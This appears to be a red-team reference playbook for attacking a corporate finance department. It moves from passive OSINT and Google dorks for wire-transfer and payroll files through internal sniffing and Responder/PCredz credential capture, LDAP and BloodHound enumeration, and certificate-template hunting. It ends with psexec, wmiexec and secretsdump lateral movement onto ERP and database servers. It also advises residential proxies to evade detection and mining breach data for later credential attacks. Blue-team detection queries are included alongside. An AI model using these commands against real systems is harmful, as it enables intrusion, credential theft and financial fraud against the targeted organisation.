opensource
Open-Source Intelligence — Corporate Finance Recon Reference
Position: External (unauthenticated) → On-network (no creds) → Authenticated
Goal: Systematically map a corporate finance department's attack surface from passive OSINT through internal enumeration to crown jewel identification
Visual Overview
graph TB
subgraph "Phase 1: Passive External OSINT (Zero Contact)"
A1[crt.sh / CT Logs]
A2[Shodan / Censys]
A3[Google Dorks]
A4[SEC/EDGAR Filings]
A5[LinkedIn Hierarchy]
A6[GitHub / Breach Data]
end
subgraph "Phase 2: Semi-Passive Recon (Light Contact)"
B1[Subdomain Enum]
B2[httpx Tech Fingerprinting]
B3[SSL/TLS SAN Extraction]
B4[Email Harvesting]
B5[ASN / IP Discovery]
end
subgraph "Phase 3: Finance System Fingerprinting"
C1[ERP URL Identification]
C2[Subdomain Naming Patterns]
C3[Payment Infrastructure OSINT]
C4[Regulatory Disclosure Mining]
end
subgraph "Phase 4: Internal Passive Recon (Post-Access)"
D1[tcpdump / Sniffing]
D2[TLS SNI Harvesting]
D3[Responder -A Mode]
D4[PCredz / Traffic Analysis]
D5[Subnet Purpose Mapping]
end
subgraph "Phase 5: Internal AD/LDAP Finance Enumeration"
E1[Anonymous LDAP Bind]
E2[Authenticated LDAP Query]
E3[GPO Analysis]
E4[Service Account Discovery]
end
subgraph "Phase 6: Internal OSINT Sources"
F1[Confluence / Wiki]
F2[JIRA / ServiceNow]
F3[SMB Share Spidering]
F4[AD CS Cert Harvesting]
end
subgraph "Phase 7: Finance Traffic Analysis"
G1[ERP Protocol Signatures]
G2[tshark Traffic ID]
end
subgraph "Phase 8: Lateral Movement to Crown Jewels"
H1[BloodHound Path Analysis]
H2[Admin Check / Pwn3d!]
H3[ERP Database Access]
H4[Secrets Dumping]
end
A1 & A2 & A3 & A4 & A5 & A6 --> B1 & B2 & B3 & B4 & B5
B1 & B2 & B3 & B4 & B5 --> C1 & C2 & C3 & C4
C1 & C2 & C3 & C4 --> D1 & D2 & D3 & D4 & D5
D1 & D2 & D3 & D4 & D5 --> E1 & E2 & E3 & E4
E1 & E2 & E3 & E4 --> F1 & F2 & F3 & F4
F1 & F2 & F3 & F4 --> G1 & G2
G1 & G2 --> H1 & H2 & H3 & H4
style A1 fill:#00ff00
style A2 fill:#00ff00
style A3 fill:#00ff00
style A4 fill:#00ff00
style A5 fill:#00ff00
style A6 fill:#00ff00
style B1 fill:#99ff00
style B2 fill:#99ff00
style B3 fill:#99ff00
style B4 fill:#99ff00
style B5 fill:#99ff00
style C1 fill:#99ff00
style C2 fill:#99ff00
style C3 fill:#99ff00
style C4 fill:#99ff00
style D1 fill:#ffaa00
style D2 fill:#ffaa00
style D3 fill:#ffaa00
style D4 fill:#ffaa00
style D5 fill:#ffaa00
style E1 fill:#ff0000
style E2 fill:#ff0000
style E3 fill:#ff0000
style E4 fill:#ff0000
style F1 fill:#ff0000
style F2 fill:#ff0000
style F3 fill:#ff0000
style F4 fill:#ff0000
style G1 fill:#ff0000
style G2 fill:#ff0000
style H1 fill:#ff0000
style H2 fill:#ff0000
style H3 fill:#ff0000
style H4 fill:#ff00001. Passive External OSINT (Zero Target Contact)
Passive reconnaissance is the most critical phase for targeting financial infrastructure. Because finance departments are heavily regulated and often rely on complex, third-party ecosystems, they leave a significant digital footprint that can be mapped without ever touching the target's network.
1.1 Certificate Transparency & Subdomain Discovery
Certificate Transparency (CT) logs provide a historical and real-time view of every SSL/TLS certificate issued for a domain. This is the most reliable way to find hidden finance portals, staging environments, and legacy ERP systems.
# crt.sh curl API to find subdomains
curl -s "https://crt.sh/?q=%.target.com&output=json" | jq -r '.[].name_value' | sort -u
# Censys query for certificates matching the target domain
# Search for certificates where the common name or SAN matches the target
services.tls.certificates.leaf_data.subject.common_name: "target.com"
# subfinder for comprehensive passive subdomain enumeration
# Queries multiple APIs (BinaryEdge, C99, CertSpotter, Chinaz, DNSDB, Fofa, etc.)
subfinder -d target.com -all -silent
1.2 Google Dorking for Finance Assets
Google dorks allow for precise identification of exposed financial documents, login portals, and configuration files.
Finance Portals & Login Pages:
site:target.com inurl:login "finance"site:target.com inurl:erp "sap" | "oracle" | "netsuite" | "workday"site:target.com intitle:"SAP NetWeaver Portal"site:target.com intitle:"Oracle Applications Login"site:target.com intitle:"NetSuite Login"site:target.com intitle:"Workday Login"
Sensitive Documents:
site:target.com filetype:pdf "annual report" "confidential"site:target.com filetype:xlsx "budget" | "payroll" | "accounts payable" | "accounts receivable"site:target.com filetype:docx "wire transfer instructions" | "ACH instructions"site:target.com filetype:pdf "SWIFT" | "BIC" | "IBAN"
Exposed Configuration & Logs:
site:target.com filetype:log "sap" | "oracle" | "erp"site:target.com inurl:config "db_password" | "api_key"site:target.com "index of" "finance" | "accounting"
1.3 Shodan & Censys for ERP Identification
Search for specific ERP signatures across the target's IP space to identify on-premise vs. cloud deployments.
Shodan Queries:
org:"Target Corp" "SAP NetWeaver"org:"Target Corp" "Oracle EBS"org:"Target Corp" "NetSuite"org:"Target Corp" "Workday"http.title:"SAP NetWeaver Portal"http.title:"Oracle Applications"http.component:"SAP NetWeaver"http.component:"Oracle E-Business Suite"
1.4 LinkedIn & SEC/EDGAR Analysis
Understanding the human hierarchy and regulatory disclosures provides the "why" and "who" behind the technical infrastructure.
-
LinkedIn Finance Hierarchy Mapping:
- Identify the CFO, VP of Finance, and Controller.
- Map the Accounts Payable (AP) and Accounts Receivable (AR) teams.
- Look for "Treasury Analysts" and "ERP Systems Administrators".
- Note the software mentioned in their profiles (e.g., "5 years experience with SAP S/4HANA").
-
SEC/EDGAR (10-K Filings):
- Search for "Item 1A. Risk Factors": Often mentions reliance on specific ERP vendors.
- Search for "Item 7. Management's Discussion and Analysis": May discuss ongoing digital transformation or ERP migrations.
- Search for "Material Contracts": Can reveal agreements with financial service providers.
-
Job Posting Analysis:
- Search for "SAP Basis Administrator", "Oracle EBS Developer", or "NetSuite Consultant" at the target company.
- Requirements often list specific versions (e.g., "Experience with SAP ECC 6.0 EHP8").
- Mentions of "integrating Workday with internal payroll systems" reveal architectural details.
1.5 GitHub Leaks & Breach Data
- GitHub Dorks:
target.com "SWIFT"target.com "ACH"target.com "wire transfer"target.com "api_key payment"target.com "db_password finance"
- ExifTool Metadata Extraction:
- Download public PDFs (Annual Reports, Invoices) and extract metadata.
exiftool annual_report.pdf | grep -E 'Author|Creator|Producer|Company'- This often reveals internal usernames, software versions (e.g., "Microsoft Word 2016"), and internal file paths.
- Breach Data:
- Use HaveIBeenPwned or DeHashed to find
@target.comemails associated with finance roles. - Analyze password patterns from historical breaches to inform future credential-based attacks.
- Use HaveIBeenPwned or DeHashed to find
OPSEC Note: 🟢 ZERO risk. All queries are directed at third-party providers. The target sees no traffic.
2. Semi-Passive Recon (Light Target Contact)
This phase involves light interaction with the target's infrastructure to validate findings from Phase 1. While it touches the target, the traffic is designed to blend in with normal web browsing or DNS resolution.
2.1 Subdomain & Tech Fingerprinting
Pipeline findings from passive tools into active fingerprinting tools to confirm the presence of finance systems.
# subfinder + amass passive enum → httpx pipeline
# Confirms which subdomains are alive and identifies the technology stack
subfinder -d target.com -silent | httpx -td -title -status-code -tech-detect
# Finance-specific subdomain wordlist probe
# Probing for common finance-related subdomains that might not be in CT logs
# billing, invoice, erp, payroll, treasury, payments, finance, accounting, ap, ar, coupa, netsuite, workday, sap, oracle
ffuf -u https://FUZZ.target.com -w finance_subdomains.txt -mc 200,301,302,403
2.2 SSL/TLS SAN Extraction
Extract Subject Alternative Names (SAN) from certificates. This often reveals internal-only subdomains that are served on the same IP as a public portal.
# Direct TLS cert grab
# Connects to the target and extracts the certificate details
openssl s_client -connect target.com:443 -servername target.com </dev/null 2>/dev/null | openssl x509 -noout -text | grep -A1 "Subject Alternative Name"
2.3 Email Harvesting & ASN Discovery
# theHarvester for email harvesting from public sources
theHarvester -d target.com -b google,bing,linkedin,duckduckgo
# ASN/IP discovery via whois and Shodan
# Identify the target's IP ranges and ASN to narrow the scope of active scanning
whois -h whois.radb.net -- '-i origin AS12345' | grep -E 'route|descr'
Warning
🔵 Blue Team Detection — Web Fingerprinting
| Event ID | Source | Triggered by |
|---|---|---|
| N/A | WAF / Access Logs | Rapid sequence of HEAD/GET requests with unique User-Agents or tool signatures (e.g., "Go-http-client") |
Splunk — Detect web tech fingerprinting:
index=web_logs status=200
| stats count dc(url) as unique_urls by src_ip, user_agent
| where unique_urls > 50 AND count > 100
| sort -count
Note: Use residential proxies and custom User-Agents to evade this detection.
3. Finance System Fingerprinting
Identifying the specific ERP and financial software in use is critical for tailoring the internal phase of the operation. Different systems have different default paths, ports, and naming conventions.
3.1 ERP Fingerprint Table
| System | Version | Default Paths | Login Indicator | Notes |
|---|---|---|---|---|
| SAP NetWeaver | 7.x | /irj/portal, /sap/bc/gui/sap/its/webgui, /nwa |
Title: "SAP NetWeaver Portal" | Verify in target env |
| Oracle EBS | R12 | /OA_HTML/AppsLocalLogin.jsp, /oa_html/AppsLogin |
Title: "Oracle Applications" | On-prem deployments |
| NetSuite | Cloud | system.netsuite.com, forms.netsuite.com |
SaaS — no on-prem paths | Always cloud-hosted |
| Workday | Cloud | *.workday.com, [company].workday.com, impl.workday.com |
SaaS | Always cloud-hosted |
| Coupa | Cloud | [company].coupahost.com |
SaaS | Always cloud-hosted |
| MS Dynamics | 365/On-prem | *.dynamics.com, /main.aspx |
SaaS or on-prem | BC/F&O distinction |
| SAP S/4HANA Cloud | Cloud | *.s4hana.ondemand.com |
SaaS | Modern cloud SAP |
| ADP | SaaS | *.adp.com, workforcenow.adp.com |
Payroll SaaS | Always external |
3.2 Subdomain & Host Naming Patterns
Finance departments often follow strict naming conventions for their infrastructure to ensure auditability and organization.
-
Subdomains:
billing.target.comerp.target.compayroll.target.comtreasury.target.compayments.target.comaccounting.target.comap.target.com(Accounts Payable)ar.target.com(Accounts Receivable)
-
Internal Host Prefixes:
FIN-(Finance)ACC-(Accounting)PAY-(Payroll)TRE-(Treasury)SAP-(SAP Servers)ORCL-(Oracle Servers)
-
Internal Host Suffixes:
-PROD(Production)-DEV(Development)-QA(Quality Assurance)-STAGE(Staging)
3.3 Payment Infrastructure OSINT
- SWIFT/BIC Codes: Search for the company's SWIFT code to identify their banking partners. This can be found on their public "Wire Transfer Instructions" or via SWIFT's online directory.
- Payment Gateways: Inspect the source code of public payment pages to identify gateways (e.g., Stripe, Adyen, Braintree, CyberSource).
- Regulatory Disclosure Mining: Mining SOC2 reports, PCI-DSS compliance statements, or GDPR disclosures (if leaked or publicly available) for network diagrams and data flow descriptions.
OPSEC Note: 🟢 ZERO risk. This is pure passive research and analysis of gathered data.
4. Internal Passive Recon (Post-Access, Pre-Enumeration)
Once on the network (e.g., via a rogue device, compromised workstation, or VPN access), the goal is to map the finance segment without sending a single packet that could trigger an IDS or NAC.
4.1 Passive Sniffing & Traffic Analysis
Use tcpdump and tshark to identify finance-related traffic by looking for specific ports and hostnames.
# Capture traffic for analysis (limit to 5000 packets to avoid large files)
sudo tcpdump -i eth0 -w internal_recon.pcap -c 5000
# tshark TLS SNI harvesting from live interface
# Identifies which internal servers are being accessed via HTTPS
sudo tshark -i eth0 -f "tcp port 443" -T fields -e ssl.handshake.extensions_server_name -Y "ssl.handshake.extension_type == 0"
# tshark TLS SNI harvesting from pcap file
tshark -r internal_recon.pcap -T fields -e ssl.handshake.extensions_server_name | sort -u
4.2 Responder & PCredz
# Responder in analyze-only mode (no poisoning)
# Listens for LLMNR, NBT-NS, and mDNS broadcasts to identify hostnames and domains
sudo responder -I eth0 -A
# PCredz to extract credentials and hashes from pcap
# Supports HTTP, FTP, SMTP, POP3, IMAP, Telnet, and NTLM
python3 Pcredz/Pcredz.py -f internal_recon.pcap
# Prebellico for network mapping from pcap
# python3 prebellico.py -f internal_recon.pcap -o /tmp/network_map
4.3 Subnet Purpose Mapping
Analyze the distribution of ports to identify the purpose of a subnet. Finance subnets often have a high density of database and ERP-specific ports.
| Port(s) | Service | Likely Subnet Purpose |
|---|---|---|
| 3200–3299 | SAP Dispatcher | SAP Application Tier |
| 3300–3399 | SAP Gateway | SAP Application Tier |
| 1521 | Oracle Listener | Database Tier (Oracle EBS) |
| 1433 | MS SQL Server | Database Tier (Dynamics/ADP) |
| 443 | HTTPS | SaaS ERP / Web Tier |
| 9000 | Oracle Forms | Legacy Oracle EBS |
| 3600 | SAP Message Server | SAP Internal Communication |
4.4 HTTP Host Header Extraction
# Extract HTTP Host headers to find internal web portals and ERP interfaces
tshark -r internal_recon.pcap -Y "http.request" -T fields -e http.host | sort -u
OPSEC Note: 🟢 ZERO risk for passive sniffing.
Warning
🔵 Blue Team Detection — Passive Sniffing Caveats
| Event ID | Source | Triggered by |
|---|---|---|
| N/A | Managed Switch | Detection of network interface in promiscuous mode (rare in corporate envs) |
| N/A | IDS / SIEM | Responder -A mode is silent, but if the tool is misconfigured to respond, it triggers LLMNR/NBT-NS poisoning alerts |
Splunk — Network Anomaly Detection:
index=network_logs
| stats count by src_mac, protocol
| eventstats avg(count) as avg_count stdev(count) as std_count by protocol
| where count > (avg_count + 3*std_count)
5. Internal AD/LDAP Finance Enumeration
Active enumeration of Active Directory to find finance-related users, groups, and service accounts. This is the first step in identifying lateral movement paths.
5.1 Anonymous LDAP Enumeration
If anonymous binds are allowed, you can map the entire finance department without any credentials.
# Search for finance-related groups
# Looks for groups containing "Finance", "Accounting", "Payroll", etc.
ldapsearch -x -H ldap://DC_IP -b 'dc=corp,dc=local' '(&(objectClass=group)(|(cn=*Finance*)(cn=*Accounting*)(cn=*Payroll*)(cn=*Treasury*)(cn=*AP*)(cn=*AR*)(cn=*ERP*)(cn=*SAP*)(cn=*Billing*)))' cn description
5.2 Authenticated LDAP Enumeration
Once you have a set of low-privileged credentials, you can perform more targeted queries.
# Enumerate users in the Finance OU
# Extracts usernames, emails, job titles, and departments
ldapsearch -x -H ldap://DC_IP -D 'user@corp.local' -w 'password' -b 'OU=Finance,DC=corp,DC=local' '(objectClass=user)' sAMAccountName mail title department
# Service account discovery filter
# Look for accounts associated with ERP systems and financial software
ldapsearch -x -H ldap://DC_IP -D 'user@corp.local' -w 'password' -b 'dc=corp,dc=local' '(|(cn=svc*sap*)(cn=svc*oracle*)(cn=svc*erp*)(cn=svc*finance*)(cn=svc*pay*))' cn sAMAccountName
5.3 PowerView Examples (Conceptual)
PowerView is the industry standard for AD enumeration.
# Get-DomainGroup -Identity "*Finance*"
# Get-DomainUser -SearchBase "OU=Finance,DC=corp,DC=local"
# Get-DomainGPO -ComputerIdentity "FIN-PROD-01"
5.4 GPO Analysis
Analyze Group Policy Objects (GPOs) applied to Finance OUs. Look for:
- Restricted Groups: Who has local admin rights on finance workstations?
- Scheduled Tasks: Are there tasks running as service accounts that could be hijacked?
- Registry Settings: Are security controls like LSA Protection or Credential Guard disabled?
Warning
🔵 Blue Team Detection — LDAP Enumeration
| Event ID | Source | Triggered by |
|---|---|---|
| 1644 | Directory Service (DC) | Expensive/large LDAP query (requires registry key to enable) |
| 4662 | Security (DC) | Reading AD objects (users, groups, GPOs) |
| 2889 | Directory Service (DC) | LDAP bind over unsigned/unencrypted channel |
Splunk — Detect bulk LDAP queries:
index=wineventlog sourcetype=WinEventLog:"Directory Service" EventCode=1644
| where SearchTimeInMs > 1000 OR EntriesReturned > 100
| stats count, avg(EntriesReturned) as avg_entries by ClientIP, Filter
| sort -avg_entries
| table ClientIP, Filter, count, avg_entries
6. Internal OSINT Sources (Wiki / Ticketing / Shares / Certs)
Internal documentation and collaboration tools are often poorly secured and contain sensitive finance information, including credentials and architectural diagrams.
6.1 Confluence & Wiki Search
Search for credentials, network diagrams, and process documents.
# Confluence REST API search for SAP credentials
# Searches for "SAP credentials" within the "FIN" space
curl -u 'user:pass' 'https://wiki.corp.local/rest/api/content/search?cql=text+~+"SAP+credentials"+AND+space.key="FIN"&limit=50'
6.2 JIRA & ServiceNow
Search for tickets related to finance systems. These often contain screenshots with sensitive info or temporary passwords.
- "ERP migration"
- "Finance server maintenance"
- "Access request for SAP"
- "Payroll system error"
- "SWIFT gateway configuration"
6.3 SMB Share Listing & Spidering
# List shares on a suspected finance server
netexec smb 10.10.10.50 -u 'user' -p 'pass' --shares
# Spider a share for sensitive keywords
# Greps for Finance, Accounting, Budget, Payroll, and ERP
# netexec smb 10.10.10.50 -u 'user' -p 'pass' -M spider_plus -o 'DOWNLOAD=False' 'KEYWORDS=Finance,Accounting,Budget,Payroll,ERP'
6.4 AD CS Certificate Harvesting
Use certipy to find vulnerable certificate templates. Compromising a certificate template can allow for domain-wide escalation or impersonation of any finance user.
certipy find -u 'user' -p 'pass' -d corp.local -dc-ip DC_IP -vulnerable
6.5 Email Distribution Group Enumeration
# PowerShell to list members of the Finance distribution group
# Reveals the full list of employees in the finance department
# Get-DistributionGroupMember -Identity "Finance-All"
Warning
🔵 Blue Team Detection — File Share Access
| Event ID | Source | Triggered by |
|---|---|---|
| 5140 | Security | A network share object was accessed |
| 5145 | Security | A network share object was checked to see whether client can be granted desired access |
| 4656 | Security | A handle to an object was requested (files/folders) |
Splunk — Detect SMB spidering:
index=wineventlog EventCode=5145
| stats dc(RelativeTargetName) as unique_files by src_ip, ShareName
| where unique_files > 100
| table src_ip, ShareName, unique_files
7. Finance Traffic Analysis — ERP Protocol Signatures
Understanding the specific protocols used by ERP systems allows for precise identification and potential interception of sensitive financial data.
7.1 ERP Traffic Table
| System | Protocol | Ports | Traffic Markers | Detection Notes |
|---|---|---|---|---|
| SAP NetWeaver (on-prem) | DIAG/SAP GUI | 3200–3299 | Large binary payloads, persistent sessions | SAP dispatcher port |
| SAP Message Server | SAP-MS | 3600, 36xx | Periodic heartbeats | Internal only |
| Oracle EBS (on-prem) | Oracle Net/TNS | 1521 | TNS listener packets | DB connection |
| Oracle Forms | Oracle Forms Listener | 9000 | Persistent connections | Legacy on-prem |
| NetSuite | HTTPS/TLS | 443 | SNI: *.netsuite.com |
Always SaaS |
| Workday | HTTPS/TLS | 443 | SNI: *.workday.com |
Always SaaS |
| Dynamics 365 | HTTPS/TLS | 443 | SNI: *.dynamics.com |
SaaS or on-prem |
| MS Dynamics (on-prem) | HTTPS + TDS | 443, 1433 | SQL Server traffic | On-prem only |
| ADP | HTTPS/TLS | 443 | SNI: *.adp.com |
SaaS payroll |
| SWIFT | HTTPS/SFTP | 443, 22 | Connections to *.swift.com |
Treasury/banking |
7.2 tshark Commands for ERP Traffic Identification
# Identify SAP GUI traffic (DIAG protocol)
sudo tshark -i eth0 -f "tcp portrange 3200-3299"
# Identify Oracle TNS traffic (Database connections)
sudo tshark -i eth0 -f "tcp port 1521" -Y "tns"
# Identify SaaS ERP traffic via SNI (Workday, NetSuite, etc.)
sudo tshark -i eth0 -f "tcp port 443" -T fields -e ssl.handshake.extensions_server_name | grep -E 'netsuite|workday|dynamics|adp'
# Identify SWIFT traffic (SFTP or HTTPS)
sudo tshark -i eth0 -f "tcp port 22 or tcp port 443" -T fields -e ssl.handshake.extensions_server_name | grep 'swift.com'
OPSEC Note: 🟢 ZERO risk for passive observation.
8. Lateral Movement Paths to Finance Crown Jewels
The ultimate goal is to reach the "Crown Jewels" — the systems containing the actual financial data, such as the ERP database or the SWIFT gateway.
8.1 Crown Jewel Tiers
- Tier 1: ERP Database Servers (SAP HANA, Oracle DB, SQL Server).
- Tier 2: ERP Application Servers (SAP NetWeaver, Oracle EBS App Tier).
- Tier 3: Finance Admin Workstations & Service Accounts.
8.2 Lateral Path Visualization
sequenceDiagram
participant U as Generic User
participant FU as Finance User
participant FA as Finance Admin
participant AS as ERP App Server
participant DB as Finance DB
U->>FU: Phishing / Credential Theft
FU->>FA: Token Impersonation / GPO Abuse
FA->>AS: Admin Access (RDP/SSH)
AS->>DB: Database Connection (Service Account)8.3 BloodHound Path Analysis
Use BloodHound to find the shortest path from your current position to the Finance Admins or ERP servers.
# Collect data from the domain
bloodhound-python -u 'user' -p 'pass' -d corp.local -dc DC_IP -c All
# Cypher Query: Find paths from all users to Finance Group
# MATCH (n:User),(m:Group {name:'FINANCE@CORP.LOCAL'}),p=shortestPath((n)-[*1..]->(m)) RETURN p
# Cypher Query: Find all users with local admin rights on ERP servers
# MATCH (u:User)-[:AdminTo]->(c:Computer) WHERE c.name =~ '(?i).*SAP.*|.*ORCL.*' RETURN u.name, c.name
8.4 Lateral Movement Techniques
Once a path is identified, use standard tools to move toward the target.
# Check for local admin rights on the ERP subnet
netexec smb 10.10.20.0/24 -u 'fin_admin' -p 'password' --local-auth 2>/dev/null | grep '(Pwn3d!)'
# Execute commands on a SAP server (requires admin)
impacket-psexec corp.local/fin_admin:password@10.10.20.50
impacket-wmiexec corp.local/fin_admin:password@10.10.20.50
# Dump credentials from a finance workstation to find service account tokens
impacket-secretsdump corp.local/fin_admin:password@10.10.20.100
# Connect to an Oracle database (Oracle EBS backend)
sqlplus system/password@//10.10.20.60:1521/ORCL
# Connect to a SQL Server database (Dynamics/ADP on-prem)
impacket-mssqlclient corp.local/svc_erp:password@10.10.20.70 -windows-auth
Warning
🔵 Blue Team Detection — Lateral Movement
| Event ID | Source | Triggered by |
|---|---|---|
| 4624 | Security | Successful logon (Type 3: Network, Type 10: RDP) |
| 4625 | Security | Failed logon |
| 4648 | Security | A logon was attempted using explicit credentials |
| 7045 | System | A service was installed in the system (PsExec) |
| 4688 | Security | A new process has been created (cmd.exe, powershell.exe) |
Splunk — Detect PsExec usage:
index=wineventlog EventCode=7045 ServiceName="PSEXESVC"
| table _time, ComputerName, ServiceName, ServiceFileName
9. OPSEC Risk Matrix — Finance OSINT & Recon
| Technique | Risk | Network Signature | Target Sees | Detection Method |
|---|---|---|---|---|
| Passive OSINT (crt.sh, Shodan, SEC/EDGAR) | 🟢 ZERO | None | Nothing | N/A |
| Google Dorking | 🟢 ZERO | None | Nothing | N/A |
| Subdomain enum (subfinder passive) | 🟢 LOW | None | Nothing | N/A |
| httpx tech fingerprinting | 🟡 LOW-MED | HTTP GET/HEAD requests | Web requests from your IP | WAF / Access Logs |
| Direct TLS cert grab | 🟡 MEDIUM | TLS Handshake | Connection to port 443 | Firewall / IDS |
| tcpdump passive sniffing | 🟢 ZERO | None | Nothing | N/A |
| Responder -A mode | 🟢 LOW | None | Nothing | N/A |
| Anonymous LDAP bind | 🟡 LOW-MED | LDAP Bind Request | Anonymous connection to DC | DC Event Logs |
| Authenticated LDAP bulk query | 🟠 MED-HIGH | Multiple LDAP Search Requests | Bulk data retrieval | Event ID 1644 |
| SMB share listing | 🟡 MEDIUM | SMB Tree Connect | Connection to port 445 | Event ID 5140 |
| SMB share spidering | 🔴 HIGH | Rapid file access | High volume of SMB traffic | Event ID 5145 |
| BloodHound collection | 🔴 HIGH | Bulk LDAP + SMB queries | Massive AD enumeration | SIEM Correlation |
| PsExec to ERP server | 🔴 VERY HIGH | Service installation + RPC | Remote command execution | Event ID 7045 |
10. Quick Reference — Finance OSINT & Recon Commands
Phase 1: Passive External
# Subdomains from CT logs
curl -s "https://crt.sh/?q=%.target.com&output=json" | jq -r '.[].name_value' | sort -u
# Shodan org search
shodan search org:"Target Corp"
Phase 2: Semi-Passive
# Tech fingerprinting
subfinder -d target.com -silent | httpx -td -title
Phase 4: Internal Passive
# Passive sniffing
sudo tcpdump -i eth0 -w capture.pcap
# SNI harvesting
tshark -r capture.pcap -T fields -e ssl.handshake.extensions_server_name | sort -u
Phase 5: Internal AD/LDAP
# Finance group search
ldapsearch -x -H ldap://DC_IP -b 'dc=corp,dc=local' '(cn=*Finance*)'
Phase 6: Internal OSINT
# SMB share list
netexec smb 10.10.10.0/24 -u 'user' -p 'pass' --shares
Phase 8: Lateral Movement
# BloodHound
bloodhound-python -u 'user' -p 'pass' -d corp.local -dc DC_IP -c All
# MSSQL Access
impacket-mssqlclient corp.local/user:pass@10.10.20.70 -windows-auth
References
- Sprocket Security — Passive Internal Recon During Continuous Penetration Testing
- The Cyphere — What is Internal Penetration Testing?
- HALOCK — Internal Network Penetration Testing
- Dev.to — Penetration Testing Guidelines for Finance Industry Workloads
- Accedia — Penetration Testing in the Finance Industry: A How-To Guide
- Intigriti — Pentesting Financial Services: Adapting to Changing Threats
- Core Security — Finance Penetration Testing Use Case
- Redscan — Internal & External Network Penetration Testing
- ProjectDiscovery — Reconnaissance: A Deep Dive in Active & Passive Recon
- InfoSecWriteups — 1000% Passive Recon Strategy You're Not Using Yet
- InfoSecTrain — Active vs Passive Reconnaissance